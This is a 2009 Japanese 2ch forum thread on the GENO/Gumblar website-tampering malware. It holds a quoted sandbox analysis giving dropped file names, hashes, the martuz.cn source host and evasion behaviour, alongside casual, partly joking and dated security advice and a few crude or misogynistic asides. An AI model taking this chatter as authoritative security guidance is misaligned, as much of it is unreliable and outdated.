* タスクトレイから常駐アイコンが消える(主にセキュリティソフト関係)
感染・改竄の流れ
* 「感染したサイト」を見ると自分のPCも感染する
* 「感染した自分のPC」で感染していないサイトを見てもそのサイトは感染しない
* 「感染した自分のPC」でサイトの更新をしている人はパスが抜かれるので、そのサイトが感染される
* 「感染したサイト」を感染していないPCで別の人が見ると(ry
>>365 女は人間の死に性的興奮をおぼえるらしいからな
通夜の席は艶の席
374 :
名無しさん@九周年:2009/05/17(日) 23:23:36 ID:spcZi1BU0
しかしGENOウイルスの作成者ってマジ頭いいな
こんなウイルスばら撒いてる暇にもっと金になる仕事やればいいのに・・・
ってクレカの番号抜いたりできるからそれで金儲け?w
通常は制限ユーザーで仕事。
これ最強
>>374 マジで中国黒社会当たりのヤクザ子飼いのクラッカーが詐欺用に作ったのかもな
377 :
名無しさん@九周年:2009/05/17(日) 23:24:57 ID:dg3Mksro0
とりあえず次スレは(小林製薬)いらんな
大手企業サイトが次々と感染、くらい書いていい
FX3はNoscript使ってるけど
IEはどこいじればいいんだっけ、設定でfaildにできたっけ?
あんまり使ってないから忘れた
380 :
名無しさん@九周年:2009/05/17(日) 23:26:46 ID:spcZi1BU0
>>376 どこの企業だか忘れたけど、アメリカで自社サイトを攻撃したハッカーを
セキュリティ担当者として採用したという話聞いたことあるな
381 :
名無しさん@九周年:2009/05/17(日) 23:27:29 ID:Gz7wcEUtO
ビスタデフォのユーザーアクセスコントロール有効なら大丈夫
切ってた自称情強は涙目w
>>380 最近じゃあまり聞かないよそういうの
アメリカで自社サイトに侵入テストしたセキュリティ担当者が
問答無用でクビになった話なら知ってるけど
383 :
名無しさん@九周年:2009/05/17(日) 23:28:52 ID:MzxzxDd80
>>364 ところがWindowsはroot(管理者)権限でアプリも動かすことが推奨なんだなw
だからアプリの穴、即システムの穴になる。
Vistaでようやくアプリ=一般権限、システム=管理者権限に分けたが、
今度は今まで使えてたアプリが動かなくなるというマヌケっぷり。
>>382 侵入テストじゃなくて侵入な
承諾を得てからやるのが侵入テストで
その場合は首になり得ない
Vistaが珍しく評価されたが
なんかMSの企みなんじゃねーの?
>>383 いまどきVistaより前の話されてもw
とりあえずavast!では何も出なかったが心配だな
>>350 ただまあ、各種SSHクライアントの挙動を監視して秘密鍵ゲットするのは敷居高いわな
トラフィック監視ですむFTPやHTTPの盗聴のがお手軽よね
389 :
名無しさん@九周年:2009/05/17(日) 23:32:57 ID:64hL7bHeO
明日、会社大変そうだなー。
感染してなきゃいいが、間違いなく感染してると思われ。
390 :
名無しさん@九周年:2009/05/17(日) 23:34:02 ID:spcZi1BU0
401 192.168.0.774 [sage] 2009/05/17(日) 22:38:51 ID:N9SKEU4J0
え〜、gnomeの人のおかげで挙動の予想がついてきたので、ちょっとexeの方を実行した時に
作成されるファイルを仮想PCで確保してみました。
ベンダーに提出するかどうかの判断は各自にお任せします。(一応、KasperskyとAVIRAには送ってあります。)
muvl.exe (元の名前 muvl.nug) - ランダム作成らしい。
MD5 : 3862b349b9b5c9283925e181ff9f5bf8
http://www.virustotal.com/jp/analisis/6ee378acae1dfede9be4c3949ee56b1a (2/40)
sqlsodbc.chm - ただのダミーファイルです。(中身は無意味なテキストと空白)
MD5 : 34cd61d83853e511f0a28027f639a1c9
http://www.virustotal.com/jp/analisis/395c9f2d6d6d38525fb24b3722664bfa (0/40)
muvl.exeは、中身に合わせて拡張子を変えてあります。(ベンダー提出時に捨てられないように)
gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。
qlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。
あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。
このマルウェアは、感染時に元の実行ファイル(martuz.cnから落ちてくるxxxx.exe)の方を消去(証拠隠滅)
するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。
391 :
名無しさん@九周年:2009/05/17(日) 23:34:19 ID:cwXPGcJB0
そんなに感染してるんだ
新型インフルエンザよりもやばそう
>>380 日本でもUG TOPってアングラサイトの管理人がセキュリティ会社開業したけど。
>>388 トラフィック監視じゃなくてキーロガーだと思う
それならパスフレーズも盗めるし、秘密鍵を暗号化していなければイチコロ
やっぱりワンタイムパスワードも併用しないとだめかなあ
>>392 んな泥棒の立てた警備会社に仕事頼む人居るのか
395 :
名無しさん@九周年:2009/05/17(日) 23:38:13 ID:ONbLLSKl0
pdfは使わないからアンインスコしたがFlashは悩む・・・
396 :
名無しさん@九周年:2009/05/17(日) 23:39:38 ID:dhcilxrp0
>>385 別にVistaが評価されてるわけじゃないよ。
XPでもユーザーを一般権限にして使えば感染は避けられる。
でも今まで使ってたアプリも動かなくなる可能性が大。
Vista同様にねw
>>383 >今まで使えてたアプリが動かなくなるというマヌケっぷり
OSがアップグレードしたらサポートしきれないアプリが出て当たり前だろ
結構重大なことだ思うけど全然スレ伸びねぇな
セキュリティは儲からない
セキュリティのスレは伸びない
これ常識
>396
へーなるほどなあ
>>383もだけど
XPの一般権限と管理権限
なぜVistaで動かないのが多いのかってのは
そういう理屈だったんだ
また一つ賢くなったよありがとう
顧客に玄人っぽく偉そうに話ができる
403 :
名無しさん@九周年:2009/05/17(日) 23:43:46 ID:Gz7wcEUtO
400
だってこのスレタイじゃ誰も興味もたんわ
ま素人が興味もったらもったでパニックになるだけだがな
404 :
名無しさん@九周年:2009/05/17(日) 23:43:58 ID:2vTllxSD0
>>380 ゴルゴに出てきたナカヤマは自分のすごさを知らずにNSAに守られてるけどな。
こえー
ネットの世界でも引きこもらなきゃならんのか・・・
406 :
名無しさん@九周年:2009/05/17(日) 23:44:33 ID:0YxTjUB10
製薬会社なんだからワクチン作成汁
>>402 でもVistaで動かないのって
自作とか素人の作ったフリーソフトとかであって
商用ソフトでいまどき動かないのは皆無
408 :
名無しさん@九周年:2009/05/17(日) 23:45:17 ID:spcZi1BU0
こういう報告があがってた
433 名前:401[sage] 投稿日:2009/05/17(日) 23:26:41 ID:N9SKEU4J0
>>416 嫌なことに、特に異変がない。
cmd.exeも普通に実行できるし、レジストリエディタも問題なく実行できる。
少なくとも、現在配布されているバージョンのウイルスについては、cmd.exe,レジストリエディタによる確認は不可能。
確認は、sqlsodbc.exeだけが頼りですね。
あと、動作が重くなったり、おかしくなった感じも特にない。仮想PCで重さの変化を感じないのだから、
実機ならまず気が付かんでしょう。
これ、今出回っているヤツだと、確実に感染したことに気がつかんと思う。
同人板その他、パンデミック状態になったの理解できるわ。
感染したことに自覚症状がないなら、騒ぎが広まらないのもわかるw
409 :
名無しさん@九周年:2009/05/17(日) 23:45:52 ID:/dh4sTucO
>>400 スレタイが悪いし、ageる奴が少ないし、ニュースに出ないし
かくいう俺も、ついさっき同人サイトでこのスレ知ったし
これからこのウイルスの情報が広がる流れだな
ヤホーとニコニコが伝えるだけでも、一気に広まるだろうけど、なにしてるんかね
410 :
名無しさん@九周年:2009/05/17(日) 23:45:54 ID:ONbLLSKl0
こうしてる間にも知らずにボコボコ感染してると予想
411 :
名無しさん@九周年:2009/05/17(日) 23:46:49 ID:V/Dj5MjT0
このクレカのパスとかの送信先を割り出せば犯人が居るんじゃないの?
>>379 NOSCRIPTって使う意味ある?
最初にスクリプトを弾いてくれるものの、危険か
どうかの判別まではしてくれないから
結局弾いたサイトのスクリプト使用を許可しちゃうんだよな
>>407 えーでも
商用ソフトで公式対応してりゃあ当然動くだろうけど
>>383 >>396 の理屈でいけば
公式対応してない商用ソフトで
いわゆる管理者権限がいるソフトは動かない確率高いのでは?
管理者権限がいるソフト
という時点でどういうソフトなのか俺には分からないが
誰か余裕があったら解説たのむ
415 :
名無しさん@九周年:2009/05/17(日) 23:49:44 ID:AixvPechO
スレタイそんなに悪いのか!?まあうまくはないな
単にスレタイ(ウィルス、小林製薬)で来てみたんだが実は深刻なんだな
>>414 今時業務で普通に使われるソフトで
公式対応してないのがないってこと
遅いところも顧客から対応迫られて
昨年度には対応してる
417 :
名無しさん@九周年:2009/05/17(日) 23:53:03 ID:UQ+VQfUW0
自分が使ってるアンチウィルスソフトで弾けるか試して見たいけどいい方法ないかな。
418 :
名無しさん@九周年:2009/05/17(日) 23:55:58 ID:ONbLLSKl0
>一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。
とかいう話もある
419 :
名無しさん@九周年:2009/05/17(日) 23:56:32 ID:IdREkqr/0
>>416 ただ、インストールはAdministratorでやらないとインスコできない
ものが多く、ユーザ権限のマシンでインストールができないのは、多い。
まぁ、多いって表現がおかしいんだけれどね。それが当たり前だし。
いままで最強にいやだったウイルスはhikaruだ。
正確にはウイルスじゃないそうだが、俺から言わせればウイルスだ
あれは今でもトラウマ。
HDD壊れてもいいからあれに感染するのだけは勘弁
セキュリティソフトも
カスペ>>ノートン>>>>>>バスター
なのは十分分かっているが、この中でhikaruを検出するのが
バスターのみって理由だけでバスター使ってるくらいだ
>>419 まぁものによって必要なのは当たり前だね
ただ大半はPowerUsers権限でインストールできたりする
UNIX系もインストールはroot権限必要なんてのは
よくあるし当たり前のことでもあるね
あの余裕のある人がいたら
ぜひちょっと付き合って教えて欲しいのですが
上の
>>383 >>396を見て俺なりに
・Vistaはアプリを一般権限でしか動かさない
↓
・今回はAdobeの脆弱性、かつ発動に管理者権限が必要
だからVistaは助かったという理屈でOKですかね?
まあ気を付けたほうがいいよ
外はインフル
中もウイルス
424 :
名無しさん@九周年:2009/05/18(月) 00:02:02 ID:xx412Puj0
周知あげ
くだらん話題で埋もれていいスレじゃないんだよ
425 :
名無しさん@九周年:2009/05/18(月) 00:02:46 ID:aCCosdg20
あげる
>>422 まぁ大まかには
それでいいんじゃないでしょうか
427 :
名無しさん@九周年:2009/05/18(月) 00:08:40 ID:sTZ5SB9U0
これじゃどこも検索できねぇwww
428 :
名無しさん@九周年:2009/05/18(月) 00:09:04 ID:8t5RAqZ80
>>424 無印には何日も前から、目立つようなスレタイでw継続スレが立ってるし
セキュ板にもスレ立ってるし、
これで見逃すような人はいくら宣伝リンク貼っても見に来ないと思う
>>420 処女じゃなかったんだよな
我が目を疑ったわ・・・・
>>426 あ、どうも
となるとついでにもう一つ聞いときたいのですが
>>375 >通常は制限ユーザーで仕事。
>これ最強
今回のウイルス限定という事でなく
そしてデータ管理は他の方法でしっかり行うとして
「仕事は制限ユーザーでログインして行う」
「その他は管理者権限で行う」
というのはある程度の意味というか
メリットありそうですかね?
というのは今回俺が一番気になってる点は
「ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集」
みたいな一文でして
「必要な場合だけ制限ユーザーでログインして入力」
という事にそれなりに意味があるなら
そうしてもいいかなあと思ってるのですが
431 :
名無しさん@九周年:2009/05/18(月) 00:16:51 ID:Ka7sRz2z0
こういうの発生する度に思うんだが、Windowsのウイルス禍って
MSのいい加減さによる人災だよな。。。
432 :
名無しさん@九周年:2009/05/18(月) 00:17:59 ID:8t5RAqZ80
433 :
名無しさん@九周年:2009/05/18(月) 00:18:49 ID:+Nl8O26l0
434 :
名無しさん@九周年:2009/05/18(月) 00:19:11 ID:sTZ5SB9U0
ノートン先生覚醒ってマジ?
見たけどカスペルスキーが検出した。
大したもんだと思った
>>432 おわっインターネットのGENOウイルススレ
ありがとうちょっとここも読んでみます
>>431 いい加減さというか、
ウィルス感染で失う客 < ウィルス対策で失う客
ってことだろ
このスレの伸びの悪さを見ると不等号の数を
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
くらいに増やしていいくらいだ
438 :
名無しさん@九周年:2009/05/18(月) 00:21:09 ID:szIhA0dy0
どんだけ検出率高くても一つ見逃せば終わるんじゃね?
>>430 メリットあるよ
ちなみにその他じゃなくて、すべて制限ユーザで行って
その中で管理者権限が必要なところがでてきたら、
管理者ユーザとして実行すれば良い
別のユーザとして実行ってメニューがあるから
まなみです!
みのりです!
りさです!
3人そろって、まなみのりさです!
441 :
名無しさん@九周年:2009/05/18(月) 00:23:55 ID:wAuLFu7rO
>>157>>186です
結局アンチウイルスのアップデートは2/3で弾く
ニフティセキュリティはページ進行を遮るで
現在リカバリ中
しかし出張中しかつかわないから
Web見たのはGW前になるんだがな
それともメール感染するの?
反日企業
Windowsの制限ユーザでハマったのはSteamのゲームくらいだな
初回起動時にレジストリいじったりDRM入れたりするゲームが時々ある
やってる事はウィルスと変わらんわけで
>>439 あー本当だ「別のユーザとして実行」って出てる
気にした事もなかった
ありがとう
ちょっと自分でもググりつつ
そのような運用を構築してみます
>>433 へー、バスターやるなあ。。。。
っておい!誤検出ランキングじゃねえかよ
446 :
名無しさん@九周年:2009/05/18(月) 00:25:43 ID:6wmHQpZRO
一方俺のNOD32は
448 :
名無しさん@九周年:2009/05/18(月) 00:27:23 ID:n3NZ7CVwO
ある意味豚インフルよりニュースで詳しくとりあげてほしい
449 :
名無しさん@九周年:2009/05/18(月) 00:27:36 ID:7VHV0ed10
>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと=システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS9以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。
450 :
名無しさん@九周年:2009/05/18(月) 00:27:55 ID:Q8SIkBp/0
あら、こんな事が起こってたのか…
感染してなさそうなことは確認できたが、ただ単に運が良かっただけみたいだな。
これ知らないで、のほほんとしてる人、凄いいっぱいいそうだね。
451 :
名無しさん@九周年:2009/05/18(月) 00:29:29 ID:sTZ5SB9U0
とりあえずしりあいに警告はした
あとはあっちが気をつけてくれりゃな
・知らないでのほほんとしている人
・ガクガクブルブルするばかりの人
・一銭にもならないのに一人でも多く救おうとする人
・感染の心配が無いので他人の不幸を見物に来てる人
・この機に乗じてFUDを撒き散らす人
>>445 検出率というと語弊があったか
検知力って書いてたから検知力でいいか
まぁtrue positiveが高いんだから性能としてはいいでしょう?
454 :
名無しさん@九周年:2009/05/18(月) 00:36:08 ID:KW5lepf/0
下から2番目のやつ多そうだなw
でもあまりメシウマにはならないと思うが・・・
小さな町の中古車屋のサイトが改ざんされたらしくmartuz.cnから読み込んでますとか出てびっくりした
456 :
名無しさん@九周年:2009/05/18(月) 00:36:38 ID:Pj6DQvPa0
これドラゴンボールで例えるとどれぐらい危険?
457 :
名無しさん@九周年:2009/05/18(月) 00:37:05 ID:ONCo3wbv0
>>431 MS「セキュリティ対策はユーザーの義務です!」キリッ
↑そういうセリフはまともなOS作ってから言えやw
458 :
名無しさん@九周年:2009/05/18(月) 00:37:12 ID:dUxSYFtm0
あさりたくさんもらって困ったから
保存の仕方や、いろんなレシピ探すのに
おもいきりググりまくったじゃないか・・
459 :
名無しさん@九周年:2009/05/18(月) 00:37:15 ID:w4iQiRAM0
初めてVistaのUACが役に立ちそうだ。
460 :
名無しさん@九周年:2009/05/18(月) 00:37:54 ID:9v4hxk8l0
>>431 それどころかウイルスはMSが作っ おいおいおい なにすんだよ こら
461 :
名無しさん@九周年:2009/05/18(月) 00:39:27 ID:rTVMMl4QP
462 :
名無しさん@九周年:2009/05/18(月) 00:40:18 ID:8GCupcsBO
>>456 たいしたことねーよ。
ヤムチャの狼牙風風拳ぐらい
MSにもAppleにもLinux陣営にもウィルス作る動機があって
もう誰が作ったやら見当もつかない
Sunをクビになった技術者が腹立ちまぎれに作った可能性だってある
なるほどなるほど
一度リストアしてすっきりした上で
新しく管理者ユーザを作成して
今のユーザーを制限ユーザにすれば
いいっぽいわけか
すぐやらねば
役に立つスレでとても助かります
466 :
名無しさん@九周年:2009/05/18(月) 00:42:38 ID:Pj6DQvPa0
467 :
名無しさん@九周年:2009/05/18(月) 00:44:00 ID:ROF5PWY90
フリーザレベルじゃね?
468 :
名無しさん@九周年:2009/05/18(月) 00:44:09 ID:wAuLFu7rO
リストア終了
データほとんどないかららくだし、メインは被害なし
ただ朝会社のpcチェックが恐怖
これってPDFリーダーをアドビから変えれば防げる?
>>460 MSは作ってないだろうが、ヴィルス対策ソフト作ってる会社は
こっそり作ってるだろうな。
84→92→
472 :
名無しさん@九周年:2009/05/18(月) 00:46:11 ID:Pj6DQvPa0
>>467 えー、レベルが違いすぎる・・・
本当はどっちですか?
473 :
名無しさん@九周年:2009/05/18(月) 00:47:22 ID:8t5RAqZ80
50 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 00:33:18.70 ID:8fz7e8f5
リアルにPCやられた。IEが強制終了される。しばらくZIPはふむな。
162 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 01:05:12.95 ID:8fz7e8f5
ああ本当に壊れた
再インストールすらさせてもらえない
何かしようとしても強制終了される。
204 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 01:15:09.39 ID:8fz7e8f5
》167ありがとうございますけど駄目でした。
今遠隔サービスで見て貰っていますがソフト入れ替えと言われた。会社のPCでZIP落としていた罰が当たりました。
日曜出動までして何してんだろ俺?もう帰宅します。明日上司になんて説明しようか?
995 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 09:53:37.05 ID:8fz7e8f5
会社のPCでZIP落としてるのばれた。
本当に死にたい。
144 名前: ケンタウレア・モンタナ(コネチカット州)[] 投稿日:2009/04/06(月) 10:55:46.05 ID:8fz7e8f5
自宅謹慎になったわ
940 名前: ミツマタ(東京都)[] 投稿日:2009/04/06(月) 18:04:22.10 ID:AhXwTJEf
ID:8fz7e8f5 ですが自宅のPCから書き込み
自主退社という形になりました
逝ってきます
このウイルスが世界中に広がりますように
このスレに気づかずに管理人に連絡とったのが悔やまれる
これってさ小林製薬の中の人が勤務中に会社のPCで同人サイト閲覧して感染しその感染PCでサイト更新したってこと?
>>473 そいつリアルタイムで見てたわ
願いが叶ったなw
>>474 同人サイトかどうかは知らないが、他は概ねそのとおり
もしかすると特殊清掃系サイトだったかもしれない
477 :
名無しさん@九周年:2009/05/18(月) 00:50:58 ID:ROF5PWY90
>>472 少なくともヤムチャではないと思うが。
ヤムチャがアンチウイルスソフト(クリリン〜ベジータレベル)の攻撃を
残らず避けて来れると思うのか?
478 :
名無しさん@九周年:2009/05/18(月) 00:52:11 ID:szIhA0dy0
知らずに勤務中に見ててやっちゃったら人生狂いそうだな
>>473 何のzip落としてたんだろう。
ていうか、不器用なやつだなぁ。
つか同人界隈しか広がってないように聞こえるけど
実際は出版だのゲーム屋だの楽天のショップだの酷いことになってるから
一概にどこで拾ったとは言えない気がする
481 :
名無しさん@九周年:2009/05/18(月) 00:52:36 ID:tg2qzOVl0
>>473 Windowsでネットしてると、人生を強制終了させられるのなw
482 :
名無しさん@九周年:2009/05/18(月) 00:52:49 ID:Pj6DQvPa0
>>477 かなり危なそうですね。
今のところ大丈夫みたいですが、これからも気をつけます。
アリガトン
483 :
名無しさん@九周年:2009/05/18(月) 00:54:07 ID:ROF5PWY90
これ感染してる人いっぱいいそうだな
485 :
名無しさん@九周年:2009/05/18(月) 00:54:29 ID:8t5RAqZ80
>>479 感染していたGENOサイトへの偽装リンクを、なぜかZIPだと思ってw踏んだらしい
いちばんタチ悪いのは、こうやってわざと感染サイトを踏ませようとするやつが出てくることかもな
>>480 同人サイトは管理人同士が見る確率高いから広まりやすいってだけだ
488 :
名無しさん@九周年:2009/05/18(月) 00:55:30 ID:0dM9T0YB0
アンチウイルスに頼ってる人は遅かれ早かれ感染するぞ
マヂな話アンチウイルスの更新は現状のウイルスに対してもはや手遅れ状態
新型やその亜種の初期感染を防ぐ事はほぼ不可能になっている
ウイルス犯罪者の更新が早すぎて亜種の判別と対策に追いつていないのだよ
有志の検体提出を受けて対応を取ってもすぐに亜種が作成されてしまう
イタチごっこが今のネットウイルスの実情
根本的にウイルスに感染しない、もしくは感染しても被害が及ばないような対策を取るしかないのだよ
出版社とか新聞社とか感染しまくってそう
今後の影響としては本屋でのエロ本の売上が伸びそうだな
491 :
名無しさん@九周年:2009/05/18(月) 00:58:53 ID:BK5ZgyO20
またAdobe Flash Playerかよ
廃止しろ廃止
492 :
名無しさん@九周年:2009/05/18(月) 00:59:14 ID:szIhA0dy0
定石として一番得する者が犯・・・ゲフンゲフン
493 :
名無しさん@九周年:2009/05/18(月) 01:00:48 ID:8t5RAqZ80
>>489 クルッポーのサイトとか今感染したら、凄いことになりそうな気がするw
/)
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ消せばいいんだよ!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
495 :
名無しさん@九周年:2009/05/18(月) 01:02:16 ID:ip69f8aU0
>>492 新アンチウイルスソフト、「ネットバーロー」とか作らにゃあかんな。
>>491 そういや前にXREAの広告改竄された時もFlashだったな・・・
498 :
名無しさん@九周年:2009/05/18(月) 01:07:18 ID:w4iQiRAM0
VistaとSilverlightを普及させるためn…おや?誰か来たようだ。ちょっと玄関に行ってくるノシ
499 :
名無しさん@九周年:2009/05/18(月) 01:08:38 ID:WHmx7NF+0
なんでこの週末になって GENO ウイルス(gumblar.cn)が話題になっているの?
自分が初めて知ったのは5/7だったが、それから1週間ぐらい経って亜種が出てきてウイルスソフトの対策より
広まったの?
>>499 一件マトモな企業HPまで感染し始めたから
501 :
名無しさん@九周年:2009/05/18(月) 01:10:17 ID:Yl/BMCl/O
サイト閲覧でもインフルエンザ感染すんの?
パソコンまじコワス
2次元でも3次元でもパンデミックでござる の巻
リアルでもネットでもウイルス祭り…、安息の地は何処にあるんだ
今思ったんだが、これAdobeのサイトが改ざんされたら悲惨なことにならないか?
>>504 海外じゃとっくにAdobeそっくりのトロイダウンロードサイトが出来てる
取りあえず暫くはPCからサイトは見ないようにするわ
507 :
名無しさん@九周年:2009/05/18(月) 01:18:39 ID:Rjnp/DgnO
恥を忍んで聞くけどadobeって何て読むの?
アドベ?アドーブ?
adobe社はアドビと主張しています
509 :
名無しさん@九周年:2009/05/18(月) 01:22:20 ID:Rjnp/DgnO
>>508 ごめんググったら一番に出てきたわ
ありがとう
あなたにとって今日が幸せでありますように
510 :
名無しさん@九周年:2009/05/18(月) 01:22:31 ID:tg2qzOVl0
まじでマックに乗り換えといて大正解だったわ
いまだ古いOSを使っとるよ
ネットするらなこれくらいで充分・・・
512 :
名無しさん@九周年:2009/05/18(月) 01:26:09 ID:Rjnp/DgnO
海外の人は読めない名前とかどうやって読んでんだろうな
カタカナとかローマ字とかないだろうし
513 :
名無しさん@九周年:2009/05/18(月) 01:27:31 ID:Yl/BMCl/O
マックOS9まじお薦め
>>511 まあ確実にウイルスばらまいてるだろうな。
あと本当にみてるだけならまだ大丈夫だけど
ネットショッピングとかしてるとアウトだしメールものぞかれててもおかしくないって忠告はしとく。
ワクチンをすべてのセキュリティソフトで共有できるようにすればいいのに
517 :
名無しさん@九周年:2009/05/18(月) 01:31:49 ID:lgOZquPl0
オレもアップルのMacOS X使ってるからウィルスとか無縁。
思わずネットは広大だわとか言いたくなる
いいかげんにしろ
マカがうざすぎ
アボーン出来ないようにわざと毎回ID変えてやがるし
死んじまえマジで
>>513 今まさに、PS6を使うために起動中だわw
軽くていい。
521 :
名無しさん@九周年:2009/05/18(月) 01:34:38 ID:s4AoIWmlO
昨日調べまくって一日が終わって感染はしてなかったが
当分携帯厨にジョブチェンジ(´・ω・`)b
>>521 もう対策パッチでてるから そんな身構えなくていいよ
マスクしてれば感染しない。
GENOウイルスの亜種か?
おまえらjavaやFlash使いまくりのサイト閲覧しててGENOウィルスは知ってるんだろうな?
史上最強最悪のウィルスが大企業や役所のサイトまで汚染してるんだぜ?
楽天内の某ショップや、普通の通販サイトも感染している。
単にそのサイトを見ただけで感染してしまう。
セキュリティソフトはどれも対応していない(avast!のみ警告あり)
感染したが最後、セキュリティシステムはボロボロにされるわ、
トロイやスパイウェアをテンコ盛りでインスコされるんだぞ。
新型インフルエンザなんてメじゃないほどの大流行。
「しばらくはPCやめて携帯でネットするわ」とか、
「明日は会社で1日かけて対策が必要だあ..orz」とか、
実態を知った人の間ではパニック状態になっている。
実態を知らなければ平和かって?
クレカ情報からアドレス帳、パスワード類が流出しまくっても平和と言えるならな。
【セキュリティ】サイトが改ざん被害、閲覧でウイルス感染の可能性(小林製薬)[09/05/14]
http://tsushima.2ch.net/test/read.cgi/newsplus/1242546568/
526 :
名無しさん@九周年:2009/05/18(月) 01:46:47 ID:SiSez5CI0
やっちまった(´・ω・`)
新型インフル関連スレにあるリンクを踏んだのが原因っぽい
DOS窓開かない、regedit開かない、Yahoo開かない
HDDのランプが不自然に点滅....
もうダメだ
528 :
名無しさん@九周年:2009/05/18(月) 02:00:22 ID:mC8ldwIH0
_,,..r'''""~~`''ー-.、
,,.r,:-‐'''"""~~`ヽ、:;:;:\
r"r ゝ、:;:ヽ
r‐-、 ,...,, |;;;;| ,,.-‐-:、 ヾ;:;ゝ
:i! i! |: : i! ヾ| r'"~~` :;: ::;",,-‐‐- `r'^!
! i!. | ;| l| ''"~~ 、 i' |
i! ヽ | | | ,.:'" 、ヽ、 !,ノ
ゝ `-! :| i! .:;: '~~ー~~'" ゙ヾ : : ::|
r'"~`ヾ、 i! i! ,,-ェェI二エフフ : : :::ノ~|`T <イエーイ、XP房見てるー?
,.ゝ、 r'""`ヽ、i! `:、 ー - '" :: : :/ ,/
!、 `ヽ、ー、 ヽ‐''"`ヾ、.....,,,,_,,,,.-‐'",..-'"
| \ i:" ) | ~`'''ー---―''"~
ヽ `'" ノ
529 :
名無しさん@九周年:2009/05/18(月) 02:02:17 ID:p4uP1YaM0
GENOの謝罪キタ━━━━━(゚∀゚)━━━━━ !!!!!
530 :
名無しさん@九周年:2009/05/18(月) 02:03:47 ID:GA20Mmo70
よく分からないんだけどこれ、ノートンではまだ対応してないんだよね?
執筆の仕事でPC使ってるから、かなり怖い。
しばらくネットつながないで頑張るか。
しかしうかうか検索もできんな
ヤムチャってそんなに弱かったか
検索したいんだが
>>514 そろそろ使って十年になるけど何もない
メール開いてない
ネットショッピングは年にするかしないか
2chは専ブラ
トホホホ
>>531 javascript java ActiveX この辺りoffにしてブラウズしてりゃ平気じゃね?
俺がGENOだああああああああああああああ!!!!!!!!!
535 :
名無しさん@九周年:2009/05/18(月) 02:08:05 ID:iXdAJX0r0
心配なのは会社のPC
ネットショッピングしてるとjavascript onにさせられるしなぁw
java scriptのoffの仕方教えてくれんか
C:\WINDOWS\system32\sqlsodbc.chm
を検索かけたら見つからないんだけど…(((( ;゚Д゚)))ガクガクブルブル
>>538 C:\Windows\Help\mui\0411
C:\Windows\Help\mui\0409
のどっちかにあるはず
とりあえず容量ちがったら死亡
>>530 駆除できないってだけで、検出はほとんどが対策済み。
セキュリティソフト持ってないなら AdobeReaderのスクリプトをオフにすればいい
>>540 ありがとう
できました
びびりすぎてググることもせずに聞いてしまって申し訳ない
でも助かりました
>>542 心配掛けてすみません
オフにできました
>>542 安価先自分じゃなかった・・・w
焦りすぎですね俺・・・
>>545 餅搗いてコーヒー飲めw
焦ると失敗しまくるぞ・・・ orz
547 :
名無しさん@九周年:2009/05/18(月) 02:31:26 ID:Us0me7Qt0
MacOS8,6で何か気をつけることはありますか?
マカーは大丈夫
VISTAなんだけどUAC切ってたら意味ない?
意味無い
551 :
名無しさん@九周年:2009/05/18(月) 02:53:52 ID:znTEna2j0
フラッシュってアドビじゃなくてマクロメディアだろjk的
4年前に合併してんだろ
インフルAもやばいがこのウイルスもやべーな
554 :
名無しさん@九周年:2009/05/18(月) 02:55:56 ID:B4ZbpLD60
>>551 資本持ってる奴には勝てないんよ・・・・(´;ω;`)
初めてVISTAでよかったと思ったw
556 :
名無しさん@九周年:2009/05/18(月) 03:03:51 ID:YU/+o/UZ0
557 :
名無しさん@九周年:2009/05/18(月) 03:04:29 ID:NzfU4us3O
製薬会社だからウイルスか…。
>>556 そりゃ公表した時点で改竄されてるところは閉鎖してるだろ
しかもwww.kobayashi.co.jpはもとから改ざんされてないし
559 :
名無しさん@九周年:2009/05/18(月) 03:06:56 ID:lpEb2aip0
マスク紹介のページとかだったら、
頭いいなこれw
560 :
名無しさん@九周年:2009/05/18(月) 03:08:00 ID:YU/+o/UZ0
自分の使ってるhpのノートPCは最初の初期設定ではアドビはOff。
タブをクリックしないと起動できない設定。もちろん起動は可能。
Googleはさすがに凄いな。
だから別に何も起きないわけだが。
561 :
名無しさん@九周年:2009/05/18(月) 03:10:56 ID:YU/+o/UZ0
>>558 昔のHDクラッシュ・タイプに比べれば軽いと思うよ。
要は、IEも切りアドビも切って日本語ソフトもOff。これで問題ないだろ。w
562 :
名無しさん@九周年:2009/05/18(月) 03:30:11 ID:afyspx4O0
VistaのUAC最強だなw
これって Adobe 突っつくアレか
出社したやつらが何も知らずに繋いで阿鼻叫喚の図が
AdobeReaderアンインスコしてる俺に隙はなかった
566 :
名無しさん@九周年:2009/05/18(月) 05:34:23 ID:sgJRF4KF0
続々発生しているらしい亜種たちがこわいお
567 :
名無しさん@九周年:2009/05/18(月) 05:42:45 ID:xFQPYwft0
USBメモリで感染するウイルスもそうだけど、こういう明らかにWindowsの構造
自体が原因になってるウイルス被害ってMSに賠償請求できないの?
>>567 だったらMacかLinux使ってね(はぁと
で終了。
